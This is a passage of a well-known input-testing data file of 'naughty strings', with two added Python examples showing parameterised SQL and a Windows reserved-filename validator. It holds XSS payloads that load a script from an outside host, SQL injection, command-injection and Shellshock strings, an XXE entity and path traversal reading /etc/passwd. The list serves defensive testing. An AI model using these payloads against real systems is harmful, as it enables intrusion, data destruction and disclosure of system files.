<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
<IMG SRC="  javascript:alert('XSS');">
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
<SCRIPT SRC=//ha.ckers.org/.j>
<IMG SRC="javascript:alert('XSS')"
<iframe src=http://ha.ckers.org/scriptlet.html <
\";alert('XSS');//
Copy me
Scroll over me
<plaintext>
http://a/%%30%30
</textarea><script>alert(123)</script>
# SQL Injection
#
# Strings which can cause a SQL injection if inputs are not sanitized
1;DROP TABLE users
1'; DROP TABLE users-- 1
' OR 1=1 -- 1
' OR '1'='1
%
_
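# Added example, not part of the list: the SQL strings above run against an
# in-memory SQLite table, once through string concatenation and once through
# a bound parameter, plus the LIKE case that % and _ exist for. The table,
# its rows and the function names are constructed for this example; Python's
# sqlite3 module happens to refuse stacked statements, so the "DROP TABLE"
# string surfaces as a driver error here where other drivers would run it.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample table for the demonstration."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO users (name) VALUES (?)",
                     [("alice",), ("bob",), ("under_score",)])
    conn.commit()
    return conn


def find_vulnerable(conn, name: str) -> list:
    """Concatenation: the input becomes part of the SQL text."""
    sql = "SELECT name FROM users WHERE name = '" + name + "'"
    try:
        return [r[0] for r in conn.execute(sql)]
    except (sqlite3.Error, sqlite3.Warning) as exc:
        # Reached for the stacked "1'; DROP TABLE users-- 1" string: this
        # driver executes one statement per call, others do not.
        return ["<error: %s>" % type(exc).__name__]


def find_safe(conn, name: str) -> list:
    """Parameter binding: the input is only ever compared as a value."""
    return [r[0] for r in conn.execute(
        "SELECT name FROM users WHERE name = ?", (name,))]


def like_prefix_naive(conn, prefix: str) -> list:
    """Bound, but % and _ are still pattern metacharacters inside LIKE."""
    return [r[0] for r in conn.execute(
        "SELECT name FROM users WHERE name LIKE ?", (prefix + "%",))]


def like_prefix_safe(conn, prefix: str) -> list:
    """Escape the wildcards and declare the escape character."""
    escaped = (prefix.replace("\\", "\\\\")
                     .replace("%", "\\%")
                     .replace("_", "\\_"))
    return [r[0] for r in conn.execute(
        "SELECT name FROM users WHERE name LIKE ? ESCAPE '\\'",
        (escaped + "%",))]


if __name__ == "__main__":
    conn = make_db()
    for s in ["' OR 1=1 -- 1", "' OR '1'='1", "1'; DROP TABLE users-- 1"]:
        print(repr(s), "concat:", find_vulnerable(conn, s),
              "bound:", find_safe(conn, s))
    for s in ["%", "_"]:
        print(repr(s), "naive LIKE:", like_prefix_naive(conn, s),
              "escaped LIKE:", like_prefix_safe(conn, s))
```

# With concatenation the two OR strings return every row; with binding they
# return none, because no user is literally named "' OR '1'='1". Binding does
# not help with LIKE on its own: a prefix of "_" or "%" still matches every
# name until the wildcards are escaped.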
# Server Code Injection
#
# Strings which can cause a user to run code on the server as a privileged user (cf. https://news.ycombinator.com/item?id=7665153)
-
--
--version
--help
$USER
/dev/null; touch /tmp/blns.fail ; echo
`touch /tmp/blns.fail`
$(touch /tmp/blns.fail)
@{[system "touch /tmp/blns.fail"]}
# Command Injection (Ruby)
#
# Strings which can call system commands within Ruby/Rails applications
eval("puts 'hello world'")
System("ls -al /")
`ls -al /`
Kernel.exec("ls -al /")
Kernel.exit(1)
%x('ls -al /')
# XXE Injection (XML)
#
# String which can reveal system files when parsed by a badly configured XML parser
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
# Unwanted Interpolation
#
# Strings which can be accidentally expanded into different strings if evaluated in the wrong context, e.g. used as a printf format string or via Perl or shell eval. Might expose sensitive data from the program doing the interpolation, or might just represent the wrong string.
$HOME
$ENV{'HOME'}
%d
%s
{0}
%*.*s
File:///
# File Inclusion
#
# Strings which can cause a user to pull in files that should not be part of a web server
../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../etc/hosts
# Known CVEs and Vulnerabilities
#
# Strings that test for known vulnerabilities
() { 0; }; touch /tmp/blns.shellshock1.fail;
() { _; } >_[$($())] { touch /tmp/blns.shellshock2.fail; }
<<< %s(un='%s') = %u
+++ATH0
# MSDOS/Windows Special Filenames
#
# Strings which are reserved names (device and drive names) in MSDOS/Windows
CON
PRN
AUX
CLOCK$
NUL
A:
ZZ:
COM1
LPT1
LPT2
LPT3
COM2
COM3
COM4
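# Added example, not part of the list: a validator for one path component
# that rejects the reserved names above. Windows treats a device name as
# reserved even when an extension follows it (CON.txt still names the
# console) and ignores trailing spaces and dots, so the check strips those
# first. COM1 to COM9 and LPT1 to LPT9 are covered, not just the ones listed;
# the drive pattern accepts any one- or two-letter prefix followed by a colon
# so that both "A:" and "ZZ:" from the list are caught. The set name, regex
# and function names are this example's own.

```python
import re

# DOS device names; CLOCK$ is the legacy clock device from the 9x era.
RESERVED = {"CON", "PRN", "AUX", "NUL", "CLOCK$"}
RESERVED |= {f"COM{i}" for i in range(1, 10)}
RESERVED |= {f"LPT{i}" for i in range(1, 10)}

# Drive-like components such as "A:" or "ZZ:" (the list has both).
_DRIVE_RE = re.compile(r"^[A-Za-z]{1,2}:$")


def is_reserved_windows_name(name: str) -> bool:
    """True if `name` (a single path component) is a DOS device name,
    with or without an extension, or looks like a drive reference."""
    stripped = name.rstrip(" .")          # Windows drops trailing spaces/dots
    if _DRIVE_RE.match(stripped):
        return True
    base = stripped.split(".", 1)[0]      # "CON.txt" -> "CON"
    return base.upper() in RESERVED


def safe_component(name: str) -> str:
    """Prefix reserved names so they never reach the filesystem unchanged."""
    return "_" + name if is_reserved_windows_name(name) else name


if __name__ == "__main__":
    for n in ["CON", "con.txt", "Aux.tar.gz", "NUL ", "A:", "ZZ:",
              "console", "COM10", "report.txt"]:
        print(f"{n!r:14} reserved={is_reserved_windows_name(n)} "
              f"stored_as={safe_component(n)!r}")
```

# The same check applies on non-Windows servers whenever uploaded files may
# later be synced to or extracted on a Windows host: a file literally named
# "CON" cannot be created there, and "NUL.txt" silently opens the null device.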
# IRC specific strings
#
# Strings that may occur on IRC clients and make security products freak out
DCC SEND STARTKEYLOGGER 0 0 0
# Scunthorpe Problem
#
# Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)
Scunthorpe General Hospital
Penistone Community Church
Lightwater Country Park
Jimmy Clitheroe
Horniman Museum
shitake mushrooms
RomansInSussex.co.uk
http://www.cum.qc.ca/
Craig Cockburn, Software Specialist
Linda Callahan
Dr. Herman I. Libshitz
magna cum laude
Super Bowl XXX
medieval erection of parapets
evaluate
mocha
expression
Arsenal canal
classic
Tyson Gay
Dick Van Dyke
basement
# Human injection
#
# Strings which may cause a human to reinterpret their worldview
If you're reading this, you've been in a coma for almost 20 years now. We're trying a new technique. We don't know where this message will end up in your dream, but we hope it works. Please wake up, we miss you.
# Terminal escape codes
#
# Strings which punish the fools who use cat/type on this file
Roses are �[0;31mred�[0m, violets are �[0;34mblue. Hope you enjoy terminal hue
But now...�[20Cfor my greatest trick...�[8m
The quic������k brown fo�����������x... [Beeeep]
# iOS Vulnerabilities
#
# Strings which crashed iMessage in various versions of iOS
Powerلُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣ冗
🏳0🌈️